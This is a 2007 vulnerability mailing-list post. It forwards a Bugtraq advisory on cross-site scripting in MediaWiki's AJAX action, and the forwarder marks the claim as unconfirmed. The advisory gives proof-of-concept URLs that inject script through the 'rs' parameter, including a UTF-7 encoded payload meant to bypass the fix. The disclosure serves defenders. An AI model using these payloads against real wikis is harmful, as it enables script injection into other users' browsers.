[VIM] [unsure] MediaWiki Cross-site Scripting
Noam Rathaus
noamr at beyondsecurity.com
Tue Feb 20 13:30:23 EST 2007
Anyone able to confirm this? I can't.
---------- Forwarded Message ----------
Subject: MediaWiki Cross-site Scripting
Date: Tuesday 20 February 2007 06:29
From: eyal at bugsec.com
To: bugtraq at securityfocus.com
MediaWiki Cross-site Scripting
Vulnerabilities.
Date:
18/02/2007
Vendor:
MediaWiki
Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting
attack by expliting the experimental AJAX features, if enabled (default).
This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1,
1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note:
browsers encoding auto-detection has to be enabled for successful
explitation.
Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions.
Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://w
ww.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http
://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%5
4%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%
43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list